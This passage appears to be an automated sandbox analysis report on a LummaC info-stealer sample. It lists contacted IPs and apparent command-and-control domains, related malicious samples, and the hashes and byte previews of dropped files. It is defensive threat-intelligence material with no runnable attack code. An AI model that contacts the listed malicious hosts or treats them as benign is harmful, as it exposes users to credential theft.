                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target Set-up.exe, PID 7744 because there are no executed function
                                                                                                                            • Execution Graph export aborted for target vUcZzNWkKc.exe, PID 7504 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            TimeTypeDescription
                                                                                                                            03:33:13API Interceptor1x Sleep call for process: PasoCattle.exe modified
                                                                                                                            03:33:20API Interceptor9x Sleep call for process: Climb.com modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            172.67.128.184CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                              194.87.58.92CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                              3.218.7.103xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                    QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  httpbin.orgsYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  spuriotis.clickCLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.21.2.51
                                                                                                                                                  home.fortth14ht.topCLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 194.87.58.92
                                                                                                                                                  E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.121.15.192
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  RELCOM-ASRelcomGroup19022019RUCLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 194.87.58.92
                                                                                                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.244
                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.131
                                                                                                                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.244
                                                                                                                                                  hmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.131
                                                                                                                                                  harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.244
                                                                                                                                                  harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.131
                                                                                                                                                  hmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.244
                                                                                                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.87.30.79
                                                                                                                                                  x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 194.58.66.244
                                                                                                                                                  CLOUDFLARENETUSCLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.157.254
                                                                                                                                                  fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.157.254
                                                                                                                                                  lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.167.249
                                                                                                                                                  BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 104.21.80.1
                                                                                                                                                  ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.21.92.219
                                                                                                                                                  ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.198.222
                                                                                                                                                  installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 172.67.166.49
                                                                                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.132.7
                                                                                                                                                  Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.21.66.86
                                                                                                                                                  AMAZON-AESUSsYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 54.225.146.64
                                                                                                                                                  d8tp5flwzP.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                  • 18.209.65.151
                                                                                                                                                  f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 34.226.108.155
                                                                                                                                                  w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 3.218.7.103
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 172.67.128.184
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\768400\Climb.comCLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                      Process:C:\Users\user\Desktop\vUcZzNWkKc.exe
                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):425
                                                                                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):947288
                                                                                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: installer.bat, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):459790
                                                                                                                                                                      Entropy (8bit):7.999632331590964
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
                                                                                                                                                                      MD5:F9D71E9E58748BEEA3554073DCD205C8
                                                                                                                                                                      SHA1:0F059E563F46355BCA0866B3D7D0993DA4991C18
                                                                                                                                                                      SHA-256:45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
                                                                                                                                                                      SHA-512:BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):104448
                                                                                                                                                                      Entropy (8bit):5.172930596796904
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
                                                                                                                                                                      MD5:BE1780E619FC600C90159E321A7BCBB9
                                                                                                                                                                      SHA1:C710D9B6E5843AD64355C032D4835707B245170E
                                                                                                                                                                      SHA-256:DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
                                                                                                                                                                      SHA-512:F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................b........\... ... |....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):268
                                                                                                                                                                      Entropy (8bit):4.968398681802287
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
                                                                                                                                                                      MD5:41B7CDB6E286EE0E44962C8987B91D3C
                                                                                                                                                                      SHA1:E57E0B12ABC823CB91D3ACFA32AD63230405057D
                                                                                                                                                                      SHA-256:43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
                                                                                                                                                                      SHA-512:B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):141312
                                                                                                                                                                      Entropy (8bit):6.686197497967684
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
                                                                                                                                                                      MD5:2ED9FFBA1FEA63AD6D178AEA296ED891
                                                                                                                                                                      SHA1:E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
                                                                                                                                                                      SHA-256:21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
                                                                                                                                                                      SHA-512:52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.U...........tB.E..M.}.G.}..H.E.;}.|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):62464
                                                                                                                                                                      Entropy (8bit):7.997732291588885
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
                                                                                                                                                                      MD5:50CB864F887F934B80CC62A6BB08D611
                                                                                                                                                                      SHA1:C23F38262D04019CF198D4499DD95945FE078EC4
                                                                                                                                                                      SHA-256:B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
                                                                                                                                                                      SHA-512:9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.3.|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.*........Y.hTy4...n."....4..=T......A.{...b*<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.||.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.|....~........|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):59392
                                                                                                                                                                      Entropy (8bit):6.612657669946948
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
                                                                                                                                                                      MD5:A5CA22529355B052CBCCB045EC8172A1
                                                                                                                                                                      SHA1:12F5D5871B07A1EABB9B57753432FC59680830D2
                                                                                                                                                                      SHA-256:E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
                                                                                                                                                                      SHA-512:AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<*M.u.h.)M........f9..,*M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....|$P..|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):83982
                                                                                                                                                                      Entropy (8bit):7.99794941439563
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
                                                                                                                                                                      MD5:B0830E2CE03D5BC821D5136F5D8B4D5E
                                                                                                                                                                      SHA1:99840A43C60501C4F1F0151EE11798C7FA395591
                                                                                                                                                                      SHA-256:D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
                                                                                                                                                                      SHA-512:58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?*.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`*...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):119633
                                                                                                                                                                      Entropy (8bit):6.0874087589267925
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                      MD5:7D6337C50FA5EB0681D5B094E58E3541
                                                                                                                                                                      SHA1:BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
                                                                                                                                                                      SHA-256:791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
                                                                                                                                                                      SHA-512:A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
                                                                                                                                                                      Malicious:false
